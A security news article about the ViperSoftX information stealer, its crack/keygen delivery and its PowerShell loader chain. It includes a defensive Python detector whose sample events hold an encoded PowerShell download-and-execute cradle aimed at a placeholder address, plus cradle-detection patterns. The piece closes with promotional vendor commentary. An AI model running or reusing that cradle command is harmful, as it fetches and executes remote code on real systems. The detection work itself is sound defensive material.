ViperSoftX InfoStealer Adopts Sophisticated Techniques to Avoid Detection

April 28, 2023 | Ravie Lakshmanan | Data Security / Malware


A significant number of victims in the consumer and business sectors located in Australia, Japan, the US and India have been affected by an evasive information-stealing malware called ViperSoftX.

ViperSoftX was first documented in 2020, with cybersecurity firm Avast detailing a campaign in November 2022 that leveraged the malware to distribute a malicious Google Chrome extension capable of siphoning cryptocurrency from wallet apps.

Now, a new analysis by Trend Micro has revealed the malware’s adoption of “more sophisticated encryption and basic anti-analysis techniques, such as byte remapping and web browser communication blocking.”

ViperSoftX usually arrives as a software crack or key generator (keygen), using genuine, non-malicious software such as media editors and system-cleaning applications as “carriers”.

Before it downloads the first-stage PowerShell loader, the malware runs a series of anti-virtual-machine, anti-monitoring, and anti-malware checks.


The loader then decrypts and executes a second-stage PowerShell script retrieved from a remote server, which launches the main routine that installs fraudulent browser extensions to exfiltrate passwords and cryptocurrency wallet data.

The main command-and-control (C&C) servers used for the second-stage download have been observed to change monthly, suggesting an attempt by the actor to avoid detection.
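The execution chain described above (a crack or keygen “carrier” that spawns a hidden PowerShell loader, which in turn fetches and decrypts a second stage from a remote server) gives a defender a detection point at process creation. The script below is an added example, not code from the Trend Micro report or from the malware: it scores constructed Sysmon Event ID 1-style process-creation records for a crack/keygen-named parent spawning powershell.exe or pwsh.exe with hidden-window, execution-policy-bypass and encoded-command flags, decodes the UTF-16LE base64 payload, and looks for download-cradle cmdlets. The filename patterns, the alert threshold and the sample events (including the 203.0.113.10 documentation address) are assumptions for illustration.

```python
"""Score process-creation events for a crack/keygen parent launching a PowerShell loader."""
import base64
import re

# Constructed sample records shaped like Sysmon Event ID 1 fields. Paths, names and
# the 203.0.113.10 address are invented for this example; none come from the report.
SAMPLE_EVENTS = [
    {  # keygen spawning a hidden, encoded PowerShell download cradle
        "ParentImage": r"C:\Users\alice\Downloads\MediaEditor_keygen.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -Ep Bypass -Enc "
        + base64.b64encode(
            "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/loader')"
            .encode("utf-16-le")).decode(),
    },
    {  # administrator running a plain script from a console: benign
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\rotate-logs.ps1",
    },
    {  # a system-cleaner 'carrier' launching pwsh hidden, but with no cradle
        "ParentImage": r"C:\Program Files\CleanerPro\CleanerPro.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": "pwsh.exe -WindowStyle Hidden -Command Get-Date",
    },
]

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
# Assumed filename heuristic for the crack/keygen arrival vector; tune for your estate.
SUSPICIOUS_PARENT = re.compile(r"crack|keygen|activator", re.IGNORECASE)
# Loader launch style: hidden window, execution-policy bypass, encoded command.
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
BYPASS_FLAG = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.IGNORECASE)
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Download-cradle indicators searched in the raw and the decoded command text.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b|"
    r"Net\.WebClient|FromBase64String|Start-BitsTransfer", re.IGNORECASE)
ALERT_THRESHOLD = 3  # assumed: three independent indicators before alerting


def basename(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded from UTF-16LE base64, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, reasons); one point per indicator present in the event."""
    reasons = []
    if basename(event["Image"]) not in POWERSHELL_IMAGES:
        return 0, reasons
    cmd = event["CommandLine"]
    if SUSPICIOUS_PARENT.search(basename(event["ParentImage"])):
        reasons.append("parent looks like a crack/keygen")
    if HIDDEN_FLAG.search(cmd):
        reasons.append("hidden window")
    if BYPASS_FLAG.search(cmd):
        reasons.append("execution policy bypass")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    if CRADLE.search(cmd if decoded is None else cmd + " " + decoded):
        reasons.append("download cradle")
    return len(reasons), reasons


def scan(events, threshold=ALERT_THRESHOLD):
    """Return (event, score, reasons) for every event at or above the threshold."""
    hits = []
    for ev in events:
        score, why = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, why))
    return hits


if __name__ == "__main__":
    for ev, score, why in scan(SAMPLE_EVENTS):
        print(f"score={score} parent={basename(ev['ParentImage'])}: {', '.join(why)}")
```

Only the first sample trips the rule: the keygen parent, the hidden window, the policy bypass, the encoded command and the decoded cradle each add a point. The “carrier” that merely launches pwsh.exe with a hidden window scores one and stays below the threshold, which is the intended trade-off against legitimate installers that do the same; a real deployment would also correlate the child’s outbound connection (Sysmon Event ID 3) since the report notes the second-stage server rotates monthly.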



“It also uses some basic anti-C&C analysis by prohibiting communications with web browsers,” said Trend Micro researcher Don Ovid Ladores, adding that the updated version of ViperSoftX scans for the presence of the KeePass 2 and 1Password password managers.

As a mitigation, users are advised to download software only from official platforms and sources and to avoid pirated software, cracks, and keygens.

“The cybercriminals behind ViperSoftX are also skilled enough to execute a seamless malware execution chain while staying under the radar of authorities by selecting one of the most effective methods of delivering malware to consumers,” Ladores added.

Ikaroa, a full stack tech company, has taken note of a recent shift in the cyber security threats facing the world. ViperSoftX, an information stealer first documented in 2020, has acquired new techniques that let it remain largely undetected by traditional anti-malware and antivirus software.

ViperSoftX uses several tactics that make it harder to detect and to disrupt. Its command-and-control servers change monthly, which complicates tracing the operation and taking it down. Before it fetches its PowerShell loader it runs anti-virtual-machine, anti-monitoring and anti-malware checks, so it can recognise an analysis sandbox and stop before revealing its later stages. It encrypts its second-stage payload and blocks communication with web browsers, which makes its traffic and its command-and-control infrastructure harder, though not impossible, to analyse.

Ikaroa is concerned about such threats, and more effort should go into developing reliable security solutions capable of blocking ransomware, browser hijackers and other malicious programs, including this class of information-stealing malware. Ikaroa also suggests training computer users in security basics: install software only from official sources, avoid cracks and keygens, and keep systems patched to reduce the risk of infection and data theft.

Overall, ViperSoftX makes life harder for security teams and poses a threat to computer users across the world. Ikaroa takes this threat seriously and encourages its customers to stay up to date with the latest patches and security tooling, so as to reduce the risk of attack from such software.

